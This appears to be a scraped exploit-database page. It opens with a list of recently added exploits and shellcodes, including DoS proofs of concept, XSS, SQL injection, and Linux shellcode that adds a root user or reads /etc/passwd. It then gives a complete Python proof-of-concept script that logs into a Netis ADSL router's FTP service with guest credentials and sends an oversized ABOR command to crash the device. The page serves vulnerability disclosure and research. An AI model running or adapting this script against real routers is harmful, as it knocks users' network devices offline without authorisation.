
7 changes to exploits/shellcodes XAMPP Control Panel 3.2.2 - Denial of Service (PoC) Notebook Pro 2.0 - Denial Of Service (PoC) Oracle VirtualBox Manager 5.2.18 r124319 - 'Name Attribute' Denial of Service (PoC) Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC) CA Release Automation NiMi 6.5 - Remote Command Execution Gitweb 1.7.3.3 - Cross-Site Scripting gitWeb 1.7.3.3 - Cross-Site Scripting Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes) Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes) Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes) Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes) Linux/x86 - Add Root User (r00t/blank) + Polymorphic Shellcode (103 bytes) Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes) Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes) Linux/x86 - echo _Hello World_ + Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
43 lines
No EOL
1.2 KiB
Python
Executable file
43 lines
No EOL
1.2 KiB
Python
Executable file
# Exploit Title: Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)
|
|
# Author: Cakes
|
|
# Discovery Date: 2018-09-16
|
|
# Vendor Homepage: http://www.netis-systems.com
|
|
# Software Link: http://www.netis-systems.com/Home/detail/id/74.html
|
|
# Tested Version: RTK 2.1.1
|
|
# Tested on OS: Kali Linux
|
|
# CVE: N/A
|
|
|
|
# Description
|
|
# The FTP service is vulnerable to a Denial of Service attack. Attackers simply need to log
|
|
# into the router and send and valid FTP command with a character offset of 1461 as the command input
|
|
|
|
import socket
|
|
|
|
evil = '\x41'*1461
|
|
|
|
print "\n[*] Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)"
|
|
print "\r[i] Creating socket"
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
print "\r[i] Connecting..."
|
|
connect = s.connect(('192.168.1.1',21))
|
|
s.recv(1024)
|
|
|
|
try:
|
|
s.send('USER guest\r\n')
|
|
s.recv(1024)
|
|
s.send('PASS guest\r\n')
|
|
s.recv(1024)
|
|
print "\r[+] Connected"
|
|
except:
|
|
print "\r[!] Credentials aren't working. Please change if none default"
|
|
|
|
print "\r[+] Sending Payload"
|
|
|
|
try:
|
|
s.send('ABOR %s' % (evil))
|
|
print "\r[+] Payload sent"
|
|
print "\r[+] Router offline"
|
|
except:
|
|
print "\r[!] Something went wrong"
|
|
|
|
s.close() |